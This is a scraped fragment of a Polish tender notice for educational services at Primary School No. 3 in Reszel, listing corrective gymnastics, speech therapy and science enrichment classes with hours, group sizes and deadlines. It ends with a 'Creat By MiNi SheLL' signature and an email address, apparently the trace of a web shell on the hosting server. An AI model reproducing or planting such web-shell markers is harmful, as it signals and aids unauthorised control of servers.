Gimnastyka korekcyjna dla uczniów z wadami postawy i obniżoną sprawnością fizyczną 10 letni staż pracy pedagogicznej, studia podyplomowe lub kurs w zakresie pedagogiki korekcyjno - kompensacyjnej, nauczycieli	2. Godzin w latach  2011,2012,2013,
75h	150h	75h	5 grup
Gimnastyka korekcyjna dla uczniów z wadami postawy i obniżoną sprawnością fizyczną.
a).Zajęcia te będą polegały na korygowaniu zdiagnozowanych wad postawy typu: skolioza, lordoza, płaskostopie, koślawość kolan oraz zwiększaniu wydolności i sprawności fizycznej. Do zajęć gimnastyki korekcyjnej zostanie zakwalifikowanych 72 uczniów  4 grupy po 15 osób i 1 grupa 12 osobowa w pierwszym roku realizacji 2011,2012 zgodnie z Zarządzeniem MEN z dnia 19. XI. 1996 r. w sprawie zasad organizowania przez szkoły i placówki publiczne gimnastyki korekcyjnej oraz nadobowiązkowych zajęć z wychowania fizycznego, 
b).39 uczniów w tym 4 grupy po 8 osób i 1 grupa 7 osobowa w drugim roku realizacji  2012,2013. 
    Produkty: 1 godz. zajęć w tygodniu dla każdej z 5 grup tj. 30 godz. w roku, zaś 60 godz. w  ciągu 2 lat - (docelowo 300h dla 5 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
    Efekt: Zmniejszenie wad postawy i podniesienie poziomu sprawności fizycznej u 32 chłopców i 40 dziewczynek klas I-III z SP 3 w Gminie Reszel poprzez działania edukacyjno-profilaktyczne prowadzone w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup usług edukacyjnych, obejmujących przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych w ramach Projektu Raz dwa trzy, potrafisz i Ty w terminie od dnia podpisania umowy do 28 czerwca 2013r. w Szkole Podstawowej Nr 3 w Reszlu, ul. Konopnickiej 2. 
1.Usługi edukacyjne będą realizowane w następujących specjalnościach podzielonych na części stanowiących  załącznik 1A do umowy: Wymagania dane do przetargu na zakup usług edukacyjnych projekt Raz, dwa, trzy potrafisz i Ty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 10 letni staż pracy pedagogicznej, 5 letnie studia w zakresie logopedii lub studia podyplomowe w tym zakresie, nauczycieli 2. Godzin w latach  2011,2012,2013,
120h	240h	120h	8 grup
 Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
a).Zajęcia logopedyczne z uczniami będą polegały na ćwiczeniu poprawnej pod względem artykulacyjnym i komunikatywnym wymowy. Na zajęcia logopedyczne zostanie zakwalifikowanych 32 uczniów  8 grup po 4 uczniów każda zgodnie z Rozporządzeniem MENiS z 7. I. 2003r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w pierwszym roku realizacji 2011, 2012. 
b).25 uczniów w tym 7 grup po 3 uczniów i 1 grupa 4 uczniów zgodnie z     
   Rozporządzeniem MEN z 17. XI. 2010r.w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w drugim roku realizacji 2012,2013.
 Produkty: 1godz. zajęć w tygodniu dla każdej z 8 grup, tj. 30 godz. w roku, zaś 60 godz.  w ciągu 2 lat ( docelowo 480h dla 8 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
   Efekt: Zmniejszenie specyficznych trudności u 20 chłopców i 12 dziewczynek klas I-III z SP 3 w Gminie Reszel, u których występują zaburzenia mowy, poprzez działania edukacyjno-profilaktyczne prowadzone w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup usług edukacyjnych, obejmujących przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych w ramach Projektu Raz dwa trzy, potrafisz i Ty w terminie od dnia podpisania umowy do 28 czerwca 2013r. w Szkole Podstawowej Nr 3 w Reszlu, ul. Konopnickiej 2. 
1.Usługi edukacyjne będą realizowane w następujących specjalnościach podzielonych na części stanowiących  załącznik 1A do umowy: Wymagania dane do przetargu na zakup usług edukacyjnych projekt Raz, dwa, trzy potrafisz i Ty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów zdolnych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych 10 letni staż pracy pedagogicznej, przygotowanie do pracy z dziećmi w młodszym wieku szkolnym. Nauczycieli 1. Godzin w latach  2011,2012,2013,
30h	60h	30h	2 grupy
Zajęcia rozwijające zainteresowania uczniów zdolnych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych.
a).Zajęcia te będą polegały na rozwijaniu zdolności badawczych i zainteresowań   
 matematyczno - przyrodniczych. Do zajęć rozwijających zainteresowania uczniów zdolnych zostanie zakwalifikowanych 16 uczniów  2 grupy po 8 osób każda w pierwszym roku realizacji 2011, 2012.
b).10 uczniów w tym 2 grupy po 5 osób każda w drugim roku realizacji 2012,2013 zgodnie z Rozporządzeniem MEN z 17. XI. 2010r.w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach.
 Produkty: 1 godz. zajęć w tygodniu dla każdej z 2 grup, tj. 30 godz. w roku, zaś 60 godz. w ciągu 2 lat (docelowo 120h dla 2 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
Efekt: Przyrost wiedzy i umiejętności u 6 chłopców i 10 dziewczynek szczególnie uzdolnionych z klas I-III z SP 3 w Gminie Reszel z zakresu matematyczno - przyrodniczego, poprzez działania edukacyjno-profilaktyczne prowadzone w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com